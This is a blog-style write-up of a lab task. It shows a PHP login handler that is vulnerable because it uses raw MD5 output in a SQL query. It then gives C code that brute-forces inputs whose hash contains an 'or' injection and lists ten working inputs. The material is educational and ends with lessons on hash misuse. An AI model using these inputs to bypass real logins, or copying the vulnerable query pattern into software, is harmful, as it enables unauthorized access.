Perception

Technology vs. Humanity

Brute-forcing for a reason

Last week I was assigned the task to brute-force the MD5 hashing function in-order to demonstrate a SQL injection to the following PHP login handler:

// escaping username inputs, should be safe in most cases
$username = mysql_real_escape_string($_GET['username']);

// hashing the password input
$password = md5($_GET['password'], true);

$query = "SELECT * FROM `users` WHERE username='$username'".
  " AND password='$password';";

// searching for records
$result = mysql_query($query, $dbh);

if(mysql_num_rows($result) > 0) {
  echo "login successful!";
} else {
  die("try again");
}

The major concern with this, clearly is the hashing function, which operates in “raw” mode (because of the second argument) and produces an ugly raw data stream instead of the usually expected 32-character-long hex digest. The raw string occupies 128 bits or 16 bytes, which will be interpreted into 16 ASCII characters (if there is a corresponding one) when passed into the query string. Yes it can contain single quotation marks, or the OR keyword, or problematic expressions like 1=1. And I don’t need to explain more how this story may unravel.

Maybe still one issue needs to be addressed… How to find a input that produces the malicious MD5 hash value? Good question…

Although generally considered as cryptographically broken, MD5 remains strong against pre-image attacks. It means although it is relatively easy (actually very easy) to generate two distinct files sharing the same MD5 hash, it is still difficult to find the input to MD5 given a specific hash value. The best publicly-known pre-image attack against MD5 still has the complexity of more than Big-ou of 2-to-the-123, which is a little better than brute-forcing but still not feasible. So how do we do that? As the title suggests, simply brute-forcing the hashing function itself is a very viable solution, because it’s fast.

Cryptographic hash functions are designed to be (or at least “appear” to be)  non-distinguishable with PRFs (Pseudo Random Functions), which means their output should appear random for all inputs. MySQL query strings support 2 types of “or” operators: the “||” operator, and all case-insensitive combinations of the word “or”. The MySQL interpreter also regard any string starting with a number as an integer, regardless of the stuff following the leading number. This actually gives us plenty of flexibility constructing the malicious hash value: it only needs to contain the following sub-string: a single quote, followed by one of the five possible “or” operators, followed by another single quote, and followed by a number. For example, "'or'2", or "'||'7", should all work like a charm. Now what we need is a way to generate enough input strings so that we can bump into a working hash value that successfully injects the SQL query shown above.

Since MD5 still resembles a PRF in some way, it really doesn’t matter a lot in terms of how we generate the inputs, as long as they are guaranteed to be distinct from one another. My way of doing this is using recursive function calls to generate permutations of a fixed-length alphanumeric string, and to use the MD5 implementation in libcrypto (header is “<openssl/md5.h>”) to check through each of the permutations. I didn’t expect this to work out in one hour, so I tested my code on my laptop and decided to move it to a faster machine. The following the code written to brute-force the desired hash values, implemented in C.

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <openssl/md5.h>

static char temp[2];

static inline int check_dgst(const unsigned char *dgst);
void brute_force(int len);
void check_permutation(char *buffer, int end, int total_len, unsigned char *dgst);
static inline int md5_and_chk(const char *buffer, int total_len, unsigned char *dgst);
static inline void add_one(char *buffer, int end);

int main()
{
  temp[1] = '&#92;&#48;';
  int i;
  for(i=5; i<7; ++i)
    brute_force(i);
  return 0;
}

static inline int check_dgst(const unsigned char *dgst)
{
  unsigned int i;
  for(i=0; i<12; ++i)
  {
    if(((char)(dgst[i]) == '\'') &&
      (((char)(dgst[i+1]) == '|' && (char)(dgst[i+2]) == '|') ||
      ((char)(dgst[i+1]) == 'o' && (char)(dgst[i+2]) == 'r') ||
      ((char)(dgst[i+1]) == 'O' && (char)(dgst[i+2]) == 'R') ||
      ((char)(dgst[i+1]) == 'O' && (char)(dgst[i+2]) == 'r') ||
      ((char)(dgst[i+1]) == 'o' && (char)(dgst[i+2]) == 'R')) &&
      ((char)(dgst[i+3]) == '\''))
    {
      if((short)(dgst[i+4])<=57 && (short)(dgst[i+4])>=49)
        return 1;
    }
  }
  return 0;
}

void brute_force(int len)
{
  int i;
  char *buffer = malloc(len*sizeof(char));
  unsigned char dgst[MD5_DIGEST_LENGTH];
  for(i=0; i<len; ++i)
    buffer[i] = '0';
  check_permutation(buffer, len - 1, len, dgst);
  return;
}

void check_permutation(char *buffer, int end, int total_len, unsigned char *dgst)
{
  int i;
  int result;
  if(end==0) {
    for(i=0; i<62; ++i) {
      result = md5_and_chk(buffer, total_len, dgst);
      if(result == 1) {
        printf("Exploit found! String is: ");
        for(i=0; i<total_len; ++i)
        {
          temp[0] = buffer[i];
          printf(temp);
        }
        printf("\n");
        printf("length is %d\n", total_len);
        free(buffer);
        exit(0);
      }
      add_one(buffer, end);
    }
  } else {
    for(i=0; i<62; ++i) {
      check_permutation(buffer, end - 1, total_len, dgst);
      add_one(buffer, end);
    }
  }
  return;
}

static inline int md5_and_chk(const char *buffer, int total_len, unsigned char *dgst)
{
  MD5((unsigned char *)buffer, total_len, dgst);
  return check_dgst(dgst);
}

static inline void add_one(char *buffer, int end)
{
  char exam = buffer[end];
  if(exam=='9'){
    buffer[end] = 'a';
    return;
  } else if(exam=='z') {
    buffer[end] = 'A';
    return;
  } else if(exam=='Z') {
    buffer[end] = '0';
    return;
  } else {
    buffer[end] = (char)((short)exam + 1);
    return;
  }
}

Totally to my surprise, my program found a result after running for only merely more than one minute, and it was on my 4-year-old laptop, and my program is not multi-thread capable. Either there are too many such hash values or I was just getting lucky on this. So I modified my program to make it keep generating outputs instead of terminating right after one match, and moved it to a new machine which calculates about twice faster than my old laptop. Well, in 45 minutes, it yields the following results:

97frd
  
rHtuK0
  
SEpr42
  
Q7Uf26
  
gBLxI6
  
wxpyXa
  
ckHAEb
  
en5O5f
  
4jEZYg
  
9uYB0h

I had to kill the process since I had to yield the machine to someone else, but it can be clearly seen that such combinations of hash values are pretty prevalent, and brute-forcing them is quite a feasible option given the computational power of modern computers. As far as I know libcrypto does not implement MD5 in a very performance-oriented way. I have seen crazy people using hand-written and optimized assembly code to implement MD5, which can be twice as fast as the GCC-compiled and optimized version used in libcrypto and openssl. I believe the biggest calculation overhead for this program is to evaluate the MD5 hash, so we can see how this can be done pretty efficiently even though we do not have access to the highest-performance implementation available.

Lesson learned is that we probably should never use plain cryptographic hash functions (even secure hash functions like SHA-3) to keep us from information theft… Sometimes they are so fast that brute-forcing becomes no longer impractical. Probably nobody will ever use “raw” hash functions in their SQL queries (since it’s off by default, and I didn’t even know there was a “raw” mode until I came across with this problem…), but we may use them to store passwords or other sensitive credentials. Always keep in mind that cryptographic hash functions are designed to be means to further implement message authentication, but not to keep certain information confidential in an unbreakable way. People always take it for granted that brute-forcing is silly and won’t work, this example just showed the potential danger of the prejudice like that.